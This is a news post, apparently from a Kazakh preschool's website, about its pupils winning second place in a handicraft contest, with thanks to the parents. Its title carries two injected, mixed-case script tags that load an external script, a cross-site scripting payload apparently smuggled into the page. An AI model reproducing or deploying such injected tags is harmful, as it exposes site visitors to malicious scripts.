"Шымырлық пен шеберлік күні" байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.03.2022

Жақындап келе жатқан Наурыз - мейрамына орай "Қарлығаш" мектепалды тобының тәрбиеленушілері Акулова Анастасия, Жүсіп Айтуар, Кенесары Аблайхан, Коренько Алиса, Мезенцева Руслана, Серік Дәмелі және тәрбиеші Сахнова Нина Анатольевна "Балаларды ерте дамыту институты" РММ және "Облыстық оқу - әдістемелік орталығы" КММ ұйымдастырған "Шымырлық пен шеберлік күні" байқауына қатысты. Аталған іс-шараның мақсаты: шығармашылық жұмысқа тарту және қазақ халқының мәдениетімен, дәстүрлерімен және ұлттық ойындарымен таныстыру арқылы мектеп жасына дейінгі балалардың танымдық қабілеттерін, қызығушылықтарын, белсенділігін қалыптастыруға ықпал ету. "Әке көрген оқ жонар, ана көрген тон пішер" номинациясында балалар мен ата-аналардың қатысуымен Қолөнер жасау бойынша біз құрметті II орынды иелендік.

Тәрбиеленушілердің ата-аналарына: Н.Б. Акуловаға, А.А. Жусуповаға, Д. У. Жетписпаеваға, В.Г. Мезенцеваға, А. К. Таласоваға, Т. В. Стефановичке қабырға тұмарын дайындаудағы белсенді ынтымақтастығы үшін алғысымызды білдіреміз.

Просмотров: 483


Пікір қосу



Деректерді қолтаңбаға қосу
Текст